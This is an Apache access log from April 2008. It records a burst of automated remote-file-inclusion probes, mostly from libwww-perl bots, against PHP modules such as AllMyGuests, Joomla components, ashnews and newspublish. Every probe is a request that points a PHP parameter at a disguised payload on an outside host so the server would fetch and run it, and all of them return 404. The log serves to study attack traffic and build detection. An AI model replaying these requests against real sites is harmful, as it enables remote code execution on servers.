65.36.177.149 - - [27/Apr/2008:19:38:22 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
209.59.192.33 - - [27/Apr/2008:19:38:24 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:24 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:24 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:24 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:24 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:24 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:30 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
209.59.192.33 - - [27/Apr/2008:19:38:31 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
67.228.55.26 - - [27/Apr/2008:19:38:34 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:38:34 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:38:34 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:38:37 -0600] "GET /logs/access_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
207.210.67.51 - - [27/Apr/2008:19:38:38 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
207.210.67.51 - - [27/Apr/2008:19:38:38 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
207.210.67.51 - - [27/Apr/2008:19:38:38 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
207.210.67.51 - - [27/Apr/2008:19:38:46 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
207.210.67.51 - - [27/Apr/2008:19:38:47 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
207.210.67.51 - - [27/Apr/2008:19:38:48 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
207.210.67.51 - - [27/Apr/2008:19:38:48 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
67.228.55.26 - - [27/Apr/2008:19:38:55 -0600] "GET /logs/access_log.20080330//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:38:55 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
207.210.67.51 - - [27/Apr/2008:19:38:56 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
67.228.55.26 - - [27/Apr/2008:19:38:57 -0600] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:38:57 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
209.8.234.8 - - [27/Apr/2008:19:39:00 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.812"
209.8.234.8 - - [27/Apr/2008:19:39:00 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.812"
209.8.234.8 - - [27/Apr/2008:19:39:00 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.812"
81.174.65.190 - - [27/Apr/2008:19:39:07 -0600] "GET /logs/access_log.20080406/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
81.174.65.190 - - [27/Apr/2008:19:39:07 -0600] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
81.174.65.190 - - [27/Apr/2008:19:39:07 -0600] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
209.8.234.8 - - [27/Apr/2008:19:39:08 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.812"
91.121.64.29 - - [27/Apr/2008:19:39:14 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
91.121.64.29 - - [27/Apr/2008:19:39:14 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
91.121.64.29 - - [27/Apr/2008:19:39:15 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
67.228.55.26 - - [27/Apr/2008:19:39:17 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
87.106.46.92 - - [27/Apr/2008:19:39:17 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
87.106.46.92 - - [27/Apr/2008:19:39:17 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
87.106.46.92 - - [27/Apr/2008:19:39:18 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
213.235.247.137 - - [27/Apr/2008:19:39:20 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
213.235.247.137 - - [27/Apr/2008:19:39:20 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
213.235.247.137 - - [27/Apr/2008:19:39:20 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
213.235.247.137 - - [27/Apr/2008:19:39:20 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
213.235.247.137 - - [27/Apr/2008:19:39:20 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
213.235.247.137 - - [27/Apr/2008:19:39:20 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
72.30.226.190 - - [27/Apr/2008:19:39:21 -0600] "GET /logs/error_log HTTP/1.0" 200 75230 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.64.29 - - [27/Apr/2008:19:39:30 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
87.106.46.92 - - [27/Apr/2008:19:39:34 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
213.235.247.137 - - [27/Apr/2008:19:39:38 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
213.235.247.137 - - [27/Apr/2008:19:39:39 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:18 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:19 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:19 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:19 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:19 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:19 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
81.174.65.190 - - [27/Apr/2008:19:40:22 -0600] "GET /logs/error_log.20080406/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
217.148.95.133 - - [27/Apr/2008:19:40:34 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
217.148.95.133 - - [27/Apr/2008:19:40:35 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
67.228.55.26 - - [27/Apr/2008:19:40:36 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:40:39 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:40:39 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
85.25.152.14 - - [27/Apr/2008:19:40:39 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
85.25.152.14 - - [27/Apr/2008:19:40:39 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
91.121.64.29 - - [27/Apr/2008:19:40:45 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
91.121.64.29 - - [27/Apr/2008:19:40:46 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
208.100.1.157 - - [27/Apr/2008:19:41:06 -0600] "GET /logs/access_log/sub.php?menu=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:41:06 -0600] "GET /sub.php?menu=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:41:06 -0600] "GET /logs/sub.php?menu=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:41:07 -0600] "GET /logs/access_log.20080406/sub.php?menu=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
93.93.112.23 - - [27/Apr/2008:19:41:47 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
93.93.112.23 - - [27/Apr/2008:19:41:47 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
93.93.112.23 - - [27/Apr/2008:19:41:48 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
93.93.112.23 - - [27/Apr/2008:19:41:52 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
93.93.112.23 - - [27/Apr/2008:19:41:53 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
93.93.112.23 - - [27/Apr/2008:19:41:53 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
72.51.25.186 - - [27/Apr/2008:19:42:05 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
72.51.25.186 - - [27/Apr/2008:19:42:05 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
72.51.25.186 - - [27/Apr/2008:19:42:05 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
93.93.112.23 - - [27/Apr/2008:19:42:09 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
93.93.112.23 - - [27/Apr/2008:19:42:10 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
72.51.25.186 - - [27/Apr/2008:19:42:19 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
195.74.37.170 - - [27/Apr/2008:19:43:11 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
195.74.37.170 - - [27/Apr/2008:19:43:11 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
62.84.188.7 - - [27/Apr/2008:19:43:47 -0600] "GET /sub.php?menu=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
212.58.4.204 - - [27/Apr/2008:19:44:02 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:44:02 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:44:02 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:44:03 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:44:03 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:44:03 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
217.195.115.146 - - [27/Apr/2008:19:44:09 -0600] "GET /sub.php?menu=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.130.35.104 - - [27/Apr/2008:19:44:10 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:11 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:13 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:13 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:14 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:14 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
85.11.108.130 - - [27/Apr/2008:19:44:16 -0600] "GET /sub.php?menu=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
212.58.4.204 - - [27/Apr/2008:19:44:25 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:44:30 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
195.130.35.104 - - [27/Apr/2008:19:44:31 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:32 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:36 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:44:36 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:45:18 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:45:19 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
66.179.10.151 - - [27/Apr/2008:19:45:40 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:45:40 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:45:47 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:45:47 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
195.130.35.104 - - [27/Apr/2008:19:46:01 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:46:01 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:46:02 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:46:02 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:46:07 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:46:07 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
200.87.179.130 - - [27/Apr/2008:19:46:24 -0600] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.87.179.130 - - [27/Apr/2008:19:46:25 -0600] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
67.228.55.26 - - [27/Apr/2008:19:46:29 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
